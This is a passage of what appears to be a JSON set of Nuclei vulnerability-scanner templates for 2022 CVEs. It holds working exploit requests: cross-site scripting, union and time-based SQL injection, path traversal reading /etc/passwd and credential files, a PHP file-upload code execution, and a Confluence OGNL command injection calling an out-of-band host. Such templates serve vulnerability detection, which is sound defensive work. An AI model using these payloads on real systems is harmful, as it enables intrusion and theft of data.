Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls"],"matchers-condition":"and","matchers":[{"type":"word","words":["document.getElementById(\"http://\");alert(document.domain);//\").click();","viewer.min.css"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0735","info":{"name":"GitLab CE/EE - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe","a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-28365","info":{"name":"Reprise License Manager 14.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/rlminfo"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Version","Platform type"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43016","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=<script>alert(document.domain)</script>&a=authenticate HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["EVAL=<script>alert(document.domain)</script>","cats_connected"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32028","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44957","info":{"name":"WebTareas 2.4p5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","GET /clients/editclient.php? HTTP/1.1\nHost: {{Hostname}}\n","POST /clients/editclient.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"csrfToken\"\n\n{{csrf}}\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"action\"\n\nadd\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cown\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cn\"\n\n{{randstr}}<details/open/ontoggle=alert(document.domain)>\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"add\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"zip\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"ct\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"cou\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"wp\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"fa\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"url\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"email\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"curr\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"wc\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"pym\"\n\n1\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"pyt\"\n\n7\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"c\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"ssc\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"file1\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"attnam1\"\n\n\n-----------------------------34025600472463336623659912061\nContent-Disposition: form-data; name=\"atttmp1\"\n\n\n-----------------------------34025600472463336623659912061--\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<details/open/ontoggle=alert(document.domain)>","clients/listclients.php?"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrfToken\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-32195","info":{"name":"Open edX <2022-06-06 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"+8\"onmouseover=\"alert(document.domain)\">click here to go to"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0412","info":{"name":"WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["Product not found"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-25487","info":{"name":"Atom CMS v2.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /admin/uploads.php?id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"\n\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: image/jpeg\n\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------30623082103363803402542706041--\n","GET /uploads/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["SET avatar = '(.*?)'"],"internal":true}]}]},{"id":"CVE-2022-43185","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0281","info":{"name":"Microweber Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/users/search_authors"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"display_name\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27926","info":{"name":"Zimbra Collaboration (ZCS) - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>Title???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31373","info":{"name":"SolarView Compact 6.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/Solar_AiConf.php/\"><script>alert(document.domain)</script>","HREF=\"Solar_Service.php\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25488","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/{{md5(num)}}","avatar-container"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1756","info":{"name":"Newsletter < 7.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_main_index&debug&\"><svg/onload=alert(/document.domain/)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"newsletter\") && contains(body, \"><svg/onload=alert(/document.domain/)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-26134","info":{"name":"Confluence - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/","{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(to_lower(header_1), \"x-cmd-response:\")"]},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(to_lower(response_2), \"confluence\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["x_cmd_response"],"part":"header"}]}]},{"id":"CVE-2022-0954","info":{"name":"Microweber <1.2.11 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/save_option HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\noption_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother\n","POST /module/ HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\nmodule=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,\"true\")","contains(body_3,'\\\"><img src=\\\"x\\\" onerror=\\\"alert(document.domain);\\\">\\\" placeholder=\\\"Use default')","contains(header_3,\"text/html\")","status_code_3==200"],"condition":"and"}]}]},{"id":"CVE-2022-36642","info":{"name":"Omnia MPX 1.5.0+r1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd","{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["\"username\":","\"password\":","\"mustChangePwd\":","\"roleUser\":"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-45037","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["<script>alert(document.domain)</script>","SESSION_TIMEOUT"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"username_fieldname_2","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-22897","info":{"name":"PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /modules/appagebuilder/config.xml HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"or","matchers":[{"type":"dsl","name":"time-based","dsl":["duration_2>=6","status_code_1 == 200 && compare_versions(version, \"<= 2.4.4\")"],"condition":"and"},{"type":"dsl","name":"blind-based","dsl":["status_code_1 == 200 && compare_versions(version, \"<= 2.4.4\")","contains(body_3, \"content\") && contains(body_3, \"{{Hostname}}\")","!contains(body_4, \"content\") && !contains(body_4, \"{{Hostname}}\")","len(body_3) > 200 && len(body_4) <= 22"],"condition":"and"}],"extractors":[{"type":"regex","name":"version","part":"body_1","internal":true,"group":1,"regex":["<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"]}]}]},{"id":"CVE-2022-32025","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}%23&password={{password}}\n","GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32444","info":{"name":"u5cms v8.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginsave.php?u=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-4059","info":{"name":"Cryptocurrency Widgets Pack < 2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=7","len(body_1) == 0","status_code_1 == 302","contains(body_2, \"Cryptocurrency Widgets Pack\")"],"condition":"and"}]}]},{"id":"CVE-2022-2034","info":{"name":"WordPress Sensei LMS <4.5.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"],"payloads":{"num":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_message","guid\":{\"rendered\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0381","info":{"name":"WordPress Embed Swagger <=1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/embed-swagger/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Embed Swagger","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["url: \"xss://\"-alert(document.domain)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40734","info":{"name":"Laravel Filemanager v2.5.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd","{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"],"stop-at-first-match":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-44950","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-23944","info":{"name":"Apache ShenYu Admin Unauth Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"query success\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4295","info":{"name":"Show all comments < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"Select </option>\")"],"condition":"and"}]}]},{"id":"CVE-2022-42747","info":{"name":"CandidATS 3.0.0 - Cross-Site 